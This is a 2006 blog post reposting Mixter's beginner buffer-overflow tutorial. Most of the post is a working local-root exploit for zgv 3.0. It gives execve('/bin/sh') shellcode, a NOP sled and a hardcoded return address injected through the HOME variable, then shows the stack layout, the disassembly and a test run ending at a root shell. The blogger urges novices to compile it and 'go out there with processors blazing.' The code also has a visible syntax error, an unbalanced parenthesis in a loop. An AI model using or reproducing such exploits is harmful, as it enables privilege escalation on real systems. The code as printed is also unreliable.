Writing buffer overflow exploits – a tutorial for beginners

10 09 2006

Writing buffer overflow exploits – a tutorial for beginners by MIXTER
All credit goes to Mixter for this wonderful tutorial on Buffer Overflow exploits.

Here’s his intro:

Buffer overflows in user input dependent buffers have become one of the biggest security hazards on the internet and to modern computing in general. This is because such an error can easily be made at programming level, and while invisible for the user who does not understand or cannot acquire the source code, many of those errors are easy to exploit. This paper makes an attempt to teach the novice – average C programmer how an overflow condition can be proven to be exploitable. – Mixter

And here’s the source code for a simple ZGV buffer overflow exploit

/*                   zgv v3.0 exploit by Mixter
          buffer overflow tutorial - http://1337.tsx.org

sample exploit, works for example with precompiled
    redhat 5.x/suse 5.x/redhat 6.x/slackware 3.x linux binaries */

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

/* This is the minimal shellcode from the tutorial */
static char shellcode[]=
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";

#define NOP     0x90
#define LEN     1032
#define RET     0xbffff574

int main()
{
char buffer[LEN];
long retaddr = RET;
int i;

fprintf(stderr,"using address 0x%lx\n",retaddr);

/* this fills the whole buffer with the return address, see 3b) */
for (i=0;i<LEN;i+=4)
   *(long *)&buffer[i] = retaddr;

/* this fills the initial buffer with NOP's, 100 chars less than the
   buffer size, so the shellcode and return address fits in comfortably */
for (i=0;i<LEN-strlen(shellcode)-100);i++)
   *(buffer+i) = NOP;

/* after the end of the NOPs, we copy in the execve() shellcode */
memcpy(buffer+i,shellcode,strlen(shellcode));

/* export the variable, run zgv */

setenv("HOME", buffer, 1);
execlp("zgv","zgv",NULL);
return 0;
}

/* EOF */

We now have a string looking like this:

[ ... NOP NOP NOP NOP NOP JMP SHELLCODE CALL /bin/sh RET RET RET RET RET RET ]

While zgv’s stack looks like this:

v-- 0xbffff574 is here
[     S   M   A   L   L   B   U   F   F   E   R   ] [SAVED EBP] [ORIGINAL RET]

The execution thread of zgv is now as follows:

main ... -> function() -> strcpy(smallbuffer,getenv("HOME"));

At this point, zgv fails to do bounds checking, writes beyond smallbuffer, and the return address to main is overwritten with the return address on the stack. function() does leave/ret and the EIP points onto the stack:

0xbffff574 nop
0xbffff575 nop
0xbffff576 nop
0xbffff577 jmp $0x24                    1
0xbffff579 popl %esi          3 <--\    |
[... shellcode starts here ...]    |    |
0xbffff59b call -$0x1c             2 <--/
0xbffff59e .string "/bin/shX"

Lets test the exploit…

# cc -o zgx zgx.c
# ./zgx
using address 0xbffff574
bash#

Note these are all written to be compiled with a linux app that contains the following in its library:

  1. stdio.h
  2. unistd.h
  3. stdlib.h

You should have noticed in the beginning of the code that Mixter states that the code works with:

slackware 3.x linux binaries

What does this mean to me?  It means that I should be able to compile this code with the final Backtrack linux distro, because BT = Whax + Auditor on ROIDS!!

If you can’t compile this simple code, then you need to do a little bit more learning before you go out there with processors blazing.  Its not hard, all it takes is time and persistence.  This is a good great way to start because the code is there and you can google how to compile it.  Just by doing that you will learn so much.  I know I did. SRSLY!

I started with the jpeg of death source code (which was crippled when I got my grubby little hands on it) and just kept googleing and learning until I got it to work.

Hack on fellow bored people!!!


Actions

Information

One response

15 06 2012
Ronaldinho

Howdy very cool blog!! Guy .. Excellent .. Wonderful .. I will bookmark your blog and take the feeds also…I’m satisfied to find numerous helpful information right here within the post, we want work out extra strategies in this regard, thanks for sharing.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s




%d bloggers like this: